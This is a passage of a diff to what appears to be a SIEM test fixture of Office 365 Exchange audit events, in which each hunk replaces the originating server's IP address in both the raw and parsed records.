bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4220,7 +4220,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -4294,7 +4294,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4306,7 +4306,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -4380,7 +4380,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4392,7 +4392,7 @@ "Operation": "Set-AdminAuditLogConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -4422,7 +4422,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4434,7 +4434,7 @@ "Operation": "Set-OwaMailboxPolicy", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "InstantMessagingType", @@ -4456,7 +4456,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4468,7 +4468,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "ProhibitSendReceiveQuota", @@ -4550,7 +4550,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6ddabbf8-4b7c-4982-2683-08d7adfc0c10\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6ddabbf8-4b7c-4982-2683-08d7adfc0c10\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4562,7 +4562,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -4636,7 +4636,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4648,7 +4648,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -4722,7 +4722,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"f580aae6-d0d5-4204-1a13-08d7ac0f2a03\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 